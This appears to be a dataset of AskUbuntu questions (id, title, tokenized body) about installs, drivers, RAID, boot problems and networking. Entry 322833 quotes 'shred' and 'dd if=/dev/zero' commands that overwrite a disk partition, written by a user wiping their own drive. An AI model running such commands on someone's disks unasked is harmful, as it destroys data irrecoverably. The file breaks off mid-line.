322751	trouble with new ubuntu 12.04 install	i had ubuntu 13.04 in a dual boot setup with my windows xp , but it did n't work properly , so i thought it would be good to install the ubuntu 12.04 lts version , but now this one does n't work at all . is it because ubuntu 12.04 was installed after ubuntu 13.04 , or is there another problem ? what must i do to get ubuntu 12.04 properly installed ? while installing , the ubuntu installer asked me to delete the 13.04 version and reinstall the 12.04 . i agreed , was this wrong ? for my kids i need to have both windows xp and ubuntu . i just want to have a pc that does n't break down all the time .
322755	unity hangs after installing amd catalystâ˘ 13.6 linux beta driver	i 'm trying to install the video driver for my toshiba satellite l725d-a7280 . lspci -nnk | grep -iea3 `` ( vga ) '' gives : 00:01.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati kabini [ radeon hd 8400 ] [ 1002:9830 ] subsystem : toshiba america info systems device [ 1179 : fa85 ] 00:01.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati device [ 1002:9840 ] subsystem : advanced micro devices [ amd ] nee ati device [ 1002:9840 ] i upgraded the kernel to 3.10.1 to get my wireless working . rtl8188ee make errors on 13.04 ( l75d-a7280 ) after upgrading the kernel and using these drivers , unity hangs on login and only shows the cursor and the background . after starting fresh with the kernel upgrade and doing this sudo x -configure and mv to /etc/x11/xorg.conf works but with bad performance . i 'm still very noob . how can i install the video driver for my laptop ? short-term fix this gets rid of video errors in unity how to install my ati graphic card ? but performance is still bad . more limping & information 13.6b is not compatible with kernel > 3.8 , so that 's why it wo n't work ( even though i could n't get it to work with the original kernel , so help with the 3.8 kernel would be much appreciated ) as per day to day performance , the problem is really 3d , as 2d is pretty sweet , so to keep my desktop running smoothly , i installed compizconfig settings manager , and turned off animations . i also did this and rebooted . should tide me over until my nic 's on 3.8 and/or 13.6 comes out of beta .
322757	unable to open software center nor update manager on 12.04	when i try to install software i get this : e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i keep being told to enter apt-get -f install but when i do i get this message : owner @ owner-1005ha : ~ $ apt-get -f install e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? so , i need help with what it means and how to fix this .
322767	ubuntu font with empathy	empathy use ubuntu font for the ui , but the chat texts is in the sans . how is it possible to use ubuntu font for them too ?
322768	ca n't get repository information in order to upgrade 10.10 to 11.04	after delaying for quite a while , i 'm trying to upgrade from 10.10 through to the current version . when i hit the `` check '' button in update manager , i get the following error : failed to download repository information . check your internet connection . i ca n't post the full list of what it failed to fetch as the website wo n't let me post more than 2 links , but here is the first part : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/maverick-security /main/source/sources.gz 404 not found [ ip : 91.189.91.15 80 ] , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/maverick/main/source/sources.gz 404 not found [ ip : 91.189.91.14 80 ] etc . , e : some index files failed to download , they have been ignored , or old ones used instead . these are not packages i can disable from `` other software '' . how can i fix this so that i can upgrade ?
322769	preventing networkmanager from bring certain network interfaces 'up ' by default	is there a way to specifically control which networking interfaces are brought online automatically by networkmanager when i login ? i have two wifi cards , one of which does n't work , and i need to be able to specify `` do n't automatically bring up wlan0 '' so that my wifi works and is stable . right now , i disable the interface by doing sudo ifconfig wlan0 down to manually bring down the interface after login , but i 'd like to not have to do that step . the system this is primarily going to be used on is a precise ( 12.04 ) system , but i would also like this to work with later versions as well .
322772	how do i add an executable to my search path ?	for reference , i know very little about linux , and am using it to run a program written by someone else . the instructions say add the executable 'ttt ' to the search path . in most installations this can be accomplished by linking the file to the 'bin ' subdirectory at user home . how do i go about doing this ? this executable is currently in a subfolder in the host area , as it 's running on a dual-boot computer i can not change the fact that it is a dual boot , as it is a work computer .
322774	libvirt / virsh hot backup	is it possible to do a hot backup of a running libvirt vm , or more precisely , it 's image ? what i ideally would want to do is : stop writing to the disk , but still allow reading from it cache all write actions for later create a tar stream and squeeze it over the wire to the backup storage when finished , apply all the cached changes allow direct writing again can you think of a way to achieve this procedure or something similiar ?
322777	how to replace fedora with ubuntu ?	i installed fedora a few months ago on my sony vaio model pcg-71511l laptop . i created a dvd and even a usb flash drive with ubuntu . when i restart my laptop , it restarts and runs fedora . pressing delete , f2 or f10 when the system is booting has no effect . the boot process continues , arrives at the grub boot menu from fedora and then boots to fedora . it seems that i am somehow locked out of my bios setup , and therefore i ca n't change the boot order so that i can boot from a live dvd or live usb flash drive . how do i get my laptop to boot from either a dvd or a flash drive so that i can install ubuntu and completely wipe out fedora ?
322784	konqueror : no sound with text to speech	yesterday morning when i had konqueror open and pointing at a text file . clicking on tools , then clicking on the speak text dropdown ; gave me a very quick/rushed voice . now doing the same results in no voice . ( i have a hit that this may have something to do with `` d-bus . '' )
322787	ubuntu 12.04 problem installing thinkorswim	i have follow the instructions listed in the forum as well as the thinkorswim website . i can get all the way to the launch point for showing the desktop and it wo n't show i just get a black screen and it freezes on showing desktop . i think it has to do with one either the java i am running or so have said i need to get the thinkorswim tech support to disable the splash start up screen .
322791	occasionally x fails to load	while this usually happens after a kernel update , sometimes i my computer intermittently fails to load x . it stops at tty6 so i believe it 's just x failing to load . while i was in tty6 i copied the .log x org pointed me too . i read the errors . http : //pastebin.com/wjjifa21 what stands out is the system does n't have permission to load a specific intel module . i took a snippet of the output from where i saw the first error . i can upload the entire log file if it makes diagnostic easier . the strange thing , is i 'll reboot and x will either load fine or , if it was just after a kernel upgrade ( from ubuntu repos ) i will have to boot into my previous kernel once before loading the new kernel . edit : i 'm using an ivy bridge notebook , i disabled my nvidia gpu and am only using hd 4000 graphics .
322792	toshiba c55d touchscreen..	getting a new toshiba c55d touchscreen laptop next week and want to run strictly ubuntu and firefox . want to rip every scrap of microsoft off of it ( it comes pre-loaded ) . i 'm a neophyte to ubuntu and the finer points of setting up a laptop . do i first install the latest ubuntu release , plus adobe , gmail , etc. , then go about tearing the ms junk out ? if anyone knows the ansswer , i certainly would appreciate some info on this . toivo42 .
322793	is it possible to download streamming videos off chromium ?	i like to download online streaming videos off chromium . firefox can do this , but chromium ca n't . any help ?
322794	the new ubuntu 13.04 for hadoop	i am a beginner both on ubundu and hadoop . can i have ubundu 13.x for hadoop..what is the latest version ; do i need use.. if ubundu 13.x is not recommended ; what is the stable version i can use..and what is the hadoop version required..please suggests me.. thanks in advance..
322795	install latest gwibber ( friends-app ) in ubuntu 12.04 ?	twitter is broken in the version of gwibber that comes with 12.04 ( version 3.4.x ) . is there a way to install friends-app ? i followed these steps but the ppa does n't have a version for ubuntu precise . http : //www.webupd8.org/2013/04/install-friends-app-gwibber-rewritten.html
322796	how to shrink a root partion from remote ?	i 've searched for a way , but there has n't been a definite way to do this . so ... i want to install debian next to a ubuntu 12.04.1 install on an old mac mini i have colocated with macminicolo . i have plenty of room ( 500 gig hd ) , but i need to ether : remove the swap partition and install debian in it ... ... or , resize the main ubuntu partition ( which is root , formatted ext4 ) , of which 60 gigs are used . i want to do the latter , shrinking it down by 80 gigs to safely put in a debian install . of course , i 'll back everything up beforehand . but this means needing to shrink a partition ether live or be triggered on reboot ( the raspberry pi 's raspbian offshoot of debian wheezy does this ) . going to the colo facility and shoving in a livecd is not an option ! i 'm in baltimore , the colo is in las vegas , and i do n't want to have a tech there run gparted on it if i can help it . ether way , i have to be dangerous . it 's because canonical worries me now .
322799	why is my ubuntu 12.04 not booting after grub ?	i 've seen a lot of similar issues , but none have quite answered my question . to elaborate , i am trying to dual boot ubuntu 12.04 alongside windows 8 . i am using a linux usb creator to boot linux . i have tried liliusb creator , pendrive linux usb creator , and unetbootin . all three have given me the same result . when i select my flash drive from the bios to boot into , it successfully shows the grub menu . the grub menu however , is black instead of purple that i 've seen when normally booting ubuntu . it displays the normal options to , try linux , intall linux , and boot repair . however , if i select any of these options they all result in a black screen and nothing happening . i am trying a new flash drive in a moment to see if this fixes it . if it does n't though i would still appreciate any advice or answers i can get . if this is a solved issue please redirect me ! thank you ! also this is marked as a repeat question , but the question it was marked the same as was unresolved and all answers that were relevant were graphics driver solutions . mine was a boot error and was resolved from me digging elsewhere in the askubuntu forum , so technically yes it 's repeat , but not to that question , so i hope it gets remarked as a solved answer or re-linked to the appropriate question so others who encounter the same issue which is n't graphics related , might find help in this question . extra info on my computer if it helps : asus x55c model intel hd 3000 graphics i3 duo core processor 4gb ddr3 linux is not installed currently ( hence my problem ) currently running : windows 8
322807	mount error on new , empty external hdd - ext4	apologies if this seems like a very similar question to others already on the site . i have searched for a few hours now for solutions , but nothing seems to be quite the same . i recently ( 2 days ago ) bought a new 4tb external hdd for data storage and have been trying to format it for linux ( specifically red hat 5.9 and ubuntu 12.04 ) . i used the disk utility to format it to free space and then gparted to create a single ext4 primary partition . it loads fine on the ubuntu system which i used to format the drive , however when connected to the red hat system it errors : can not mount volume . unable to mount the volume 'jdru4706 ' . mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or other error in some cases useful info is found in syslog - try dmesg | tail or so running dmesg | tail gives the following : sdb : assuming drive cache : write through scsi device sdb : 976754646 4096-byte hdwr sectors ( 4000787 mb ) sdb : write protect is off sdb : mode sense : 2b 00 10 08 sdb : assuming drive cache : write through sdb : sdb1 sd 16:0:0:0 : attached scsi disk sdb sd 16:0:0:0 : attached scsi generic sg2 type 0 usb-storage : device scan complete ext4-fs ( sdb1 ) : bad geometry : block count 976754176 exceeds size of device ( 439883264 blocks ) i do n't currently have any data on the drive so i can reformat if i need to . i do n't understand what is causing this problem however . the only reason i wish to connect to the red hat system is to copy data files across for access on my laptop ( the ubuntu system ) . any help would be much appreciated .
322809	fancontrol on no pw-capable machines	i 've installed ubuntu 13.4 on my alienware m14x and noticed one thing , cpu gets as high as 70 degrees centigrade ( with nothing resourceful running ) and cooler does n't respond to that , just stays calm and quiet . how can i change that ? fancontrol could n't help me - pwmconfig says : `` there are no pwm-capable sensor modules installed '' upd : i 've managed to control fan speed with i8kutils . by running i8kctl fan 1 2 i 've managed to speed it a bit , but i ca n't get to the highest possible speed . cpu still gets close to critical temps . upd2 : i think i 've managed preventing the laptop from overheating by installing bumblebee , but still could n't find a way to run the fan on its highest possible speed , so theoretically it still can get to critical temps . i 'll be testing that . also apparently bumblebee installation removed i8kutils so no way to control the fan manually anymore .
322812	more than 8 outputs detected ?	ever time i log into my ubuntu server 13.04 ( 3.9.9 generic kernel ) , i see [ 2.050256 ] i915 0000:00:02.0 : more than 8 outputs detected beside the login : prompt . has anyone seen this before ? what does this message mean ?
322815	allow www-data to execute a particular command	how shoud i do to allow the user www-data to execute a command like at or cronjob ?
322816	usb not booting linux on acer aspire 5750g	i have been unable to boot linux from a usb on my acer aspire 5750g laptop it goes through the boot and then freezes half way through . it has done this with every type of linux i have tried . before anyone asks i have tried every single one of these boots on my desktop computer and they work perfectly every time . this freeze only happens on my acer aspire . i have tried it on a toshiba laptop as well and it boots perfectly again . i have tried almost everything , i say almost because posting on a forum like this is the only thing i have n't tried . please be clear i 'm not concerned with installing it onto my laptop i just want it to run off a usb . please i really want this to work .
322820	dungeon defenders crashes ( steam )	hi i have dungeon defenders on ubuntu 13.04 and it the game closes or crashes every 30 minutes ( not exactly ) i have lenovo g580 intel core i7 6gb ram . i have nvidia geforce 710m but it ubuntu does n't detect it and says that i have intel hd graphics , i do n't know if that 's a problem ... this is the output on steam dlopen failed trying to load : /home/abood/.local/share/steam/linux32/libsteam.so with error : /home/abood/.local/share/steam/linux32/libsteam.so : can not open shared object file : too many levels of symbolic links game update : appid 65800 `` dungeon defenders '' , procid 7943 , ip 0.0.0.0:0 generating new string page texture 152 : 256x256 , total string texture memory is 1.46 mb execsteamurl : `` steam : //open/downloads '' ( steam:7837 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:7837 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( over 50 times ) game update : appid 65800 `` dungeon defenders '' , procid 7943 , ip 76.177.147.88:55268 installing breakpad exception handler for appid ( dungeondefenders-x86 ) /version ( 1.0_client ) dlopen failed trying to load : /home/abood/.local/share/steam/linux32/libsteam.so with error : /home/abood/.local/share/steam/linux32/libsteam.so : can not open shared object file : too many levels of symbolic links game update : appid 65800 `` dungeon defenders '' , procid 7943 , ip 0.0.0.0:0 segmentation fault ( core dumped ) game removed : appid 65800 `` dungeon defenders '' , procid 7943 ( steam:7837 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . i get this warning message multiple times . thank you for helping
322833	how can i delete everything off of my ssd hard drive , or namely the grub loader ?	i 'm currently using a live cd and i am attempting to delete everything off of my harddrive . so , i 've used the command sudo nautilus and attempted to delete everything off of my ssd . however , i can not delete the folder rofs ( read only file system ) . i generally would have absolutely no issues with this , however , i believe it is causing everything i delete to come back to life upon restarting the computer . prior to using nautilus to do this , i 've used sudo shred -vz -n 1 /dev/sda2 , and dd if=/dev/zero of=/dev/sda2 but it does n't seem to work . the grub loader still exists , i wish to demolish it , and preferably all other files . how can i remove the grub loader , and if possible , how can i delete the rofs folder entirely ?
322834	video editor where i can select specific areas	i am looking for a video editor that i can use to select specific areas it different time frames . for example , in a video that is 1920x1080 let 's say i want in the first minute to only show an area of 1024x768 located in an area of the total 1920x1080 . then after that i want to select another area in another part . the end result should show the video with only the selected areas . this is because there is a lot of parts that do not correspond to what i want to show in the video . i tried pitivi , openshot and avidemux . none have an option to select an area of the video .
322837	a few questions before updating to 13.04	about a month ago i updated my computer through the update manager . it completely broke my system . i decided to remove ubuntu and try again another time . so now i reinstalled ubuntu fresh with 12.04 . i 'm wondering if i should attempt the update with this fresh install or just do a fresh install of ubuntu 13.04 ? i 'm also wondering if there is a graphics card issue between ubuntu and my laptop . i have an hp dv7-6135dx . it has hybrid graphics capability but i have not and will not mess with these drivers because everytime i do my graphics break . i 'm just wondering if i do a fresh install will my system function with the default open source driver ?
322839	edit ubuntu details ?	long story short , i need to make it look like my computer has 2gb of ram , instead of 4gb . is there a way i can edit a file or something , to make it change in the system details ?
322840	gnome-panel icons duplicated across multiple monitors	i ask this question , because search on askubuntu is not helped for me . i have an issue : my panel icons is duplicated . i have one notebook monitor . these steps i did : reset settings in dconf : dconf reset -f /org/gnome/gnome-panel/layout/ found this question but it did n't solved my problem . panel is still duplicated . unity version is 7.0.0 , ubuntu 13.04 , kernel 3.8.0-26-generic . what i did wrong ? in my /etc/rc.local i disabled my radeon video adapter ( because this videocard is not working fine ( hardware issue ) ) : echo off > /sys/kernel/debug/vgaswitcheroo/switch there are no errors while system loading , there are no errors in /var/log/lightdm/lightdm.log , only debug information about loading display . [ +76.92s ] debug : starting session ubuntu as user ikhrome [ +76.92s ] debug : session 1462 running command /usr/sbin/lightdm-session gnome-session -- session=ubuntu [ +77.09s ] debug : new display ready , switching to it [ +77.09s ] debug : activating vt 7 [ +77.10s ] debug : registering session with bus path /org/freedesktop/displaymanager/session0 note : sometimes everything is ok , but many times panel duplicated . after boot , and sometimes after logout . notebook hp pavilion g6 1263sr . please , do n't swear me , i had this issue for 3-4 days , and google did n't helped me . and , sorry for my english . thanks all for help !
322843	install ubuntu 13.04 on sony vaio e series sve14125cnb	please help me to install ubuntu 13.04 in a dual boot setup with windows 8 on my sony vaio e series sve14125cnb laptop . when i try to install ubuntu , after the installation is finished , the system gives me a message that says : operating system missing . then i changed the bios setting as normal , and it only boots windows 8 .
322849	inspiron 15r se with hybrid graphics and trial-boot	i have on notebook inspiron 15r se with intel/amd hybrid driver , when i install de propietary amd driver , my unity disappears on the next reboot , i already format my ubuntu partition 3 times , what i have to do ? other question is : i have win7 , win8 and ubuntu on 3 partitions but grub only detect win8 , and when i start win8 with comes with win boot manager with win 8 and win 7 to select , i want to have only grub2 as boot manager , any one knows what i have to do ? thanks
322851	does man command invoke less command to display manual contents ?	whenever we use man command it opens the manual corresponding to the command ( if exists ) . operations on it are almost same as that of the less command ( like search forward using / or backward using ? or browse forward using d etc ) . i am just curious whether man command internally invokes less command to display the manual contents ?
322856	error during graphic driver installation	i 've installed kubuntu 13.04 but when i wanted to install my laptop 's graphic driver ( ati ) this error was demonstrated : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - supported adapter detected . check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.8.0-19-generic/build/include/linux/version.h can not be found on this system . fglrx installation requires that the system has gcc tool . gcc can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- please help me immediately . thanks my gcc version that has installed with kubuntu is 4.7.3
322858	install 32-bit version of oracle jdk 7 on a 64-bit ubuntu ?	i am using http : //askubuntu.com/a/61873/23678 to install the 64-bit version of oracle jdk 7 under ubuntu 64-bit . is there a way to tweak this mechanism to install the 32-bit jdk instead ? if not , how do i install a 32-bit oracle jdk 7 under ubuntu 64-bit ?
322859	custom udev rules wo n't work	i 'm trying to set a custom udev to set the /dev/sd** mount point for all 6 hdds on my system . i 've been trying to get it to work , but it just wont . i need to get this sorted because my drives seem to randomly change messing with my links and libraries . 5 of my drives are truecrypt encrypted and as such i can`t use uuid to mount to specific points . this is what i`ve been trying to use . im running ubuntu 13.04 ans have saved the file in /lib/udev/rules.d/65-persistent-hdd.rules # these are the rules to force all drives into specific /dev/sd** slots for truecrypt mounting # kernel== '' sd* '' , subsystems== '' block '' , attrs { serial } == '' 3pk0r7ad '' , symlink+= '' sda % n '' kernel== '' sd* '' , subsystems== '' block '' , attrs { serial } == '' s1uvj1lz401091 '' , symlink+= '' sdb % n '' kernel== '' sd* '' , subsystems== '' block '' , attrs { serial } == '' s1vsj1ks202775 '' , symlink+= '' sdc % n '' kernel== '' sd* '' , subsystems== '' block '' , attrs { serial } == '' w1f08blh '' , symlink+= '' sdd % n '' kernel== '' sd* '' , subsystems== '' block '' , attrs { serial } == '' s1y6j90sa14564 '' , symlink+= '' sde % n '' kernel== '' sd* '' , subsystems== '' block '' , attrs { serial } == '' s13pjdws223047 '' , symlink+= '' sdf % n '' so as you see , im trying to force { serial } == '' 3pk0r7ad '' to /dev/sda , { serial } == '' s1uvj1lz401091 '' to /dev/sdb , etc , etc
322861	how to connect to wireless network in lubuntu ?	im new to lubuntu have used ubuntu before there is no nm-applet in lubuntu . so how to connect ? pls help
322864	how can i add `` recent documents '' to the bookmarks sidebar ?	i really like the `` recent documents '' bookmark that appears when i 'm adding a file with a dialog opened by a program . how can i do so that it always appears among the bookmards in the sidebar when i open a new nautilus folder view ?
322869	console is missing my-user @	i 've just received a new ubuntu server at work , however , when logging in via the terminal i 'm missing the my-user @ server-name in the console . also , i 'm not able to use tab for finished of folder-names etc . looking at my user-folder , there 's no files in it ( no .profile , .bashrc etc. ) . as i do n't have any idea why this is happening , i 'm not able to google for similar issues . can anyone help ?
322874	how to install ubuntu ia a touch screen laptop	can ubuntu be install in a touch screen laptop . i has try few time but still can not install it . i install it using bootable usb drive .
322876	opening /etc/syslog-ng/syslog.conf	i understand that the above is a text file and i want to open in for editing . i am using : sudo /etc/syslog-ng/syslog-ng.conf how must i modify this command ?
322879	ntp date not showing the correct time	i was having an issue in which the time my ubuntu machine was showing is 5 hours ahead of my standard time . so i installed ntpd for that using apt-get install ntp after that i restarted ntp but still my time is 5 hours ahead of my standard time in india . please help .
322882	how do i change the boot order to boot the disc first ?	i was upgrading from ubuntu 12.10 to 13.04 when my laptop crashed and i was left with a wacked out version of 13.04 with no dashboard or any accessible apps . i have another live cd that was burned correctly and i 'm trying to re-install the os , but my computer o n't boot to the disc and will only boot my current version of ubuntu . how can i wipe my computer clean of these problems and just simply boot to the cd ? whenever i pres an f-key to enter the bios i just get sent to grub leaving me with no option of going into bios settings or changing the boot order to anything but a diefferent version of ubuntu .
322888	how can i speed up this system ?	i 'm running a `` nettop '' computer which is a rather low-end performer . it can probably run better ( =faster ) than it does simply by adjusting it in some way , because i guess that the standard installation includes things that i do n't need which slow the system down . i think the biggest problem is the graphics ... i 've had to ditch unity because it demanded way too much of the machine . i 'm now running plain `` gnome fallback ( no effects ) '' and that helped immensely , but when i run only firefox with 15 open tabs ( no browser extensions ) and no other apps , the system is still pretty lame . these are the specs : intel atom cpu d525 @ 1.80ghz ă 4 nvidia ion/pcie/sse2 2,0 gib ram ubuntu 13.04 64-bit being a nettop , its hardware ca n't be replaced or expanded . it already has the maximum ram . i am configuring a new computer as my primary machine ( because this one just sucks too much ) but i still want to get some decent use out of this one . what are the most obvious , most efficient performance-boosting software adjustments i can make ?
322892	dns on static ip address	i have setup my mythtv server ( runnning ubuntu 12.04 ) to have a static ip address . this is required because the ipaddress must be hardcoded in the mythtv server settings and if it changes the the mythtv client will not be able to connect . i did this using the ui ( command line answers will not be accepted ) using : network connections - > wired - > edit - > ipv4 and setting the settings as follows : this works great for mythtv however i can no longer access the internet via domain names . if i use the ipaddress it works but i ca n't resolve the dns entries . if i look at connection information ui it does not list any primary dns : ( entry is not there at all ) like it is when on dhcp . how do i configure my dns with a static ipaddress using the gui ?
322893	how to fix ogg tags ?	i am searching a command-line tagging tool that supports ogg-tagging and allows to change encoding to the tags .
322898	multiple windows from launcher	i use xterm as my default terminal emulator ( mainly because i also use osx and bsd , so having a cross-platform terminal emulator comes in handy ) . i have added an xterm icon to my unity launcher , but it does not let me open multiple xterm windows , i.e . once one window is open , right-clicking on the icon again will not show the option of opening a new window . i know that i can open new windows from the command line , but it would be nice to be able to do so from the launcher , same as i would if i were using gnome-terminal ( or any other application for that matter ) . is there a way to add the 'new window ' option to the launcher for xterm ?
322905	raid 5 inactive at boot - error : found two disks with the index 1 for raid md/0	my os is ubuntu 12.04.2 lts with this kernel : 3.2.0-49-generic # 75-ubuntu smp tue jun 18 17:39:32 utc 2013 x86_64 x86_64 x86_64 gnu/linux i have a raid 5 array composed of 3 hard drives and suddenly , when it started being inactive at boot time . since the home directory is mounted on it , the system can not boot and it 's asking for manual user intervention . i found similar reports in forums , but most of them happen to have a defective hard drive which is not the case for me . stopping the array ( mdadm -- stop /dev/md0 ) and starting it again ( mdadm -- assemble -- scan /dev/md0 ) shows no errors ( there is no complaining or array rebuilding ) and then it can be mounted properly ( manual mount ) so why it can not be brought up at boot ? after checking the smartctl for all the hard drives composing the raid array ( sda , sdb , sdc ) , i could not observe any error ( no current_pending_sector , udma_crc_error_count , offline_uncorrectable ) . short and long tests have been ran already . one thing i noticed which is mostly the cause of the problem is that grub-probe returns this error : `` error : found two disks with the index 1 for raid md/0 . '' running the same command with -v ( verbose output ) , i can spot two lines commenting `` grub-probe : info : found array md/0 ( mdraid1x ) . '' right after probing hd0 and hd1 which are mapped on sda and sdb correspondingly . so sdc does n't have readable by grub metadata for the raid ? people facing this problem suggested to update the raid metadata from 0.90 to 1.x but my raid is already using 1.2 . i tried to manually make sdc hard drive to fail twice ( the first time just removed it and re-added it and the second time by using mdadm -- zero-superblock /dev/sdc ) and forced the raid to rebuild , but the error can not go away so now i am stuck . does anyone have a clue on what the problem might be and how can it be fixed ? below there is a list of commands and their output that i used to diagnose the problem : /proc/stat after boot # cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : inactive sdc1 [ 3 ] ( s ) sda1 [ 4 ] ( s ) sdb [ 5 ] ( s ) 5860540617 blocks super 1.2 unused devices : < none > /etc/mdadm/mdadm.conf # cat /etc/mdadm/mdadm.conf # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # definitions of existing md arrays array /dev/md/0 metadata=1.2 uuid=1b273efc:62f3bc36:4579f11d:15bbc75e name=ubuntu:0 # this file was auto-generated on mon , 27 aug 2012 17:33:16 +0300 # by mkconf $ id $ mdadm -- examine -- scan # mdadm -- examine -- scan array /dev/md/0 metadata=1.2 uuid=1b273efc:62f3bc36:4579f11d:15bbc75e name=ubuntu:0 mdadm -- detail # mdadm -- detail -- scan mdadm : can not open /dev/md/0 : no such file or directory # mdadm -- detail -- scan /dev/md0 mdadm : md device /dev/md0 does not appear to be active . mdadm -- stop /dev/md0 & & mdadm -- assemble -- scan /dev/md0 & & mdadm -- detail /dev/md0 # mdadm -- stop /dev/md0 mdadm : stopped /dev/md0 # mdadm -- assemble -- scan /dev/md0 mdadm : /dev/md0 has been started with 3 drives . # cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid5 sda1 [ 4 ] sdc1 [ 3 ] sdb1 [ 5 ] 3907025920 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 3/3 ] [ uuu ] unused devices : < none > # mdadm -- detail /dev/md0 /dev/md0 : version : 1.2 creation time : sat mar 24 15:31:43 2012 raid level : raid5 array size : 3907025920 ( 3726.03 gib 4000.79 gb ) used dev size : 1953512960 ( 1863.02 gib 2000.40 gb ) raid devices : 3 total devices : 3 persistence : superblock is persistent update time : sun jul 21 22:53:21 2013 state : clean active devices : 3 working devices : 3 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 512k name : ubuntu:0 uuid : 1b273efc:62f3bc36:4579f11d:15bbc75e events : 319386 number major minor raiddevice state 4 8 1 0 active sync /dev/sda1 5 8 17 1 active sync /dev/sdb1 3 8 33 2 active sync /dev/sdc1 mdadm -- detail -- scan & & mdadm -- examine -- scan # mdadm -- detail -- scan array /dev/md0 metadata=1.2 name=ubuntu:0 uuid=1b273efc:62f3bc36:4579f11d:15bbc75e # mdadm -- examine -- scan array /dev/md/0 metadata=1.2 uuid=1b273efc:62f3bc36:4579f11d:15bbc75e name=ubuntu:0 grub-probe -v / # grub-probe -v / grub-probe : info : can not open `/boot/grub/device.map ' . grub-probe : info : scanning for dmraid_nv raid devices on disk hd0 . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : scanning for dmraid_nv raid devices on disk hd1 . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : scanning for dmraid_nv raid devices on disk hd2 . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : scanning for dmraid_nv raid devices on disk hd3 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning hd0 for lvm . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : no lvm signature found . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : scanning hd1 for lvm . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : no lvm signature found . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : scanning hd2 for lvm . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : no lvm signature found . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : scanning hd3 for lvm . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : no lvm signature found . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning for mdraid09 raid devices on disk hd0 . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : scanning for mdraid09 raid devices on disk hd1 . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : scanning for mdraid09 raid devices on disk hd2 . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : scanning for mdraid09 raid devices on disk hd3 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning for mdraid1x raid devices on disk hd0 . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : scanning for mdraid1x raid devices on disk hd1 . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : found array md/0 ( mdraid1x ) . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : scanning for mdraid1x raid devices on disk hd2 . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : scanning for mdraid1x raid devices on disk hd3 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning for mdraid09 raid devices on disk hd0 . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : scanning for mdraid09 raid devices on disk hd0 , msdos1 . grub-probe : info : the size of hd0 is 3907029168. grub-probe : info : scanning for mdraid09 raid devices on disk hd1 . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : scanning for mdraid09 raid devices on disk hd1 , msdos1 . grub-probe : info : the size of hd1 is 3907029168. grub-probe : info : scanning for mdraid09 raid devices on disk hd2 . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : scanning for mdraid09 raid devices on disk hd2 , msdos1 . grub-probe : info : the size of hd2 is 3907029168. grub-probe : info : scanning for mdraid09 raid devices on disk hd3 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning for mdraid09 raid devices on disk hd3 , msdos2 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning for mdraid09 raid devices on disk hd3 , msdos1 . grub-probe : info : the size of hd3 is 250069680. grub-probe : info : scanning for 